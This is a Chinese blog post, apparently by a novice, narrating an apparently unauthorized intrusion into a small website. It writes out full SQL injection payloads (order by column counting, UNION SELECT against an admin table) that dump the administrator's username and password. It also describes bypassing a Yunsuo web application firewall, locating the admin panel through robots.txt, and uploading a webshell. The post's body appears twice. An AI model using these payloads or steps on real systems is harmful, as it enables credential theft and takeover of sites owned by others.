【萌新】记录一次渗透小站的过程
2017-09-07 21:03
281 查看
一开始接触该站
先随便翻阅了一些目录
发现在URL中 “/ProductView.asp?ID=1021 ” 这几个字段格外引人瞩目
于是 二话不说 看看有没有注入点
输入一个 ' 看一看 发现报错了!!!
然后惯例 and 1=1, and 1=11
发现存在云锁 突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧!
云锁sql注入绕过漏洞
从这里我们发现一个绕过的漏洞
直接用firefox的hackerbar试试吧!
存在注入点! 那么继续手注吧!
构造语句:ProductView.asp?ID=1021 order by 30 发现 30不报错 31报错 那么有30的字段
继续构造注入语句 :ProductView.asp?ID=1021UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
发现直接爆了出来
然后
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,username,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
运气不错 直接username password就试了出来
那么找下后台吧!
发现用了御剑 死都扫不出来
换个思路看看 robots.txt
试着试着 找到了 后台
不愧是天选之人
感觉都满顺利的
进入后台直接修改图片
发现可以直接上传sap文件 美滋滋、
上传了几个马子 发现都被云锁拦截了 最后快要放弃的时候 上传一个发现神奇的过了!
接下来发现想Net下 都不行 还是个菜鸡一个啊 还要继续学习
未完待续
先随便翻阅了一些目录
发现在URL中 “/ProductView.asp?ID=1021 ” 这几个字段格外引人瞩目
于是 二话不说 看看有没有注入点
输入一个 ' 看一看 发现报错了!!!
然后惯例 and 1=1, and 1=11
发现存在云锁 突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧!
云锁sql注入绕过漏洞
从这里我们发现一个绕过的漏洞
直接用firefox的hackerbar试试吧!
存在注入点! 那么继续手注吧!
构造语句:ProductView.asp?ID=1021 order by 30 发现 30不报错 31报错 那么有30的字段
继续构造注入语句 :ProductView.asp?ID=1021UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
发现直接爆了出来
然后
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,username,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
运气不错 直接username password就试了出来
那么找下后台吧!
发现用了御剑 死都扫不出来
换个思路看看 robots.txt
试着试着 找到了 后台
不愧是天选之人
感觉都满顺利的
进入后台直接修改图片
发现可以直接上传sap文件 美滋滋、
上传了几个马子 发现都被云锁拦截了 最后快要放弃的时候 上传一个发现神奇的过了!
接下来发现想Net下 都不行 还是个菜鸡一个啊 还要继续学习
未完待续
相关文章推荐
- 记录一次raid故障后的恢复和回迁数据全过程
- 记录一次celery+rabbitmq的bug修复过程
- linux:记录一次 处理tomcat启动卡死无报错现象的曲折过程
- springboot 记录一次源码编译过程的纠错
- 记录一次线上组件崩溃的解决过程
- 记录一次git解决冲突的过程
- 一次net::err_connection_reset的过程记录
- Ubuntu16.04 记录一次安装greenplum的过程,以及遇到的问题与部分解决方案
- 记录一次java优化过程
- 记录一次无聊的(经历了Nodejs -> Shell -> C)的探索问题过程
- 记录一次raid故障后的恢复和回迁数据全过程 推荐
- 一次处理项目中工作流问题的过程记录
- 记录一次软件Bug发生的过程
- [置顶] 记录一次kernel内存泄漏的查找定位过程
- (转)Elasticsearch 的坑爹事——记录一次mapping field修改过程
- 记录一次chown误操作导致服务宕机修复过程(linux+nginx+php+mysql)
- 服务器一次被hack的过程记录
- 记录一次客户Oracle启动不了的解决过程
- 记录由于一次强制断电导致的服务器无法启动的恢复过程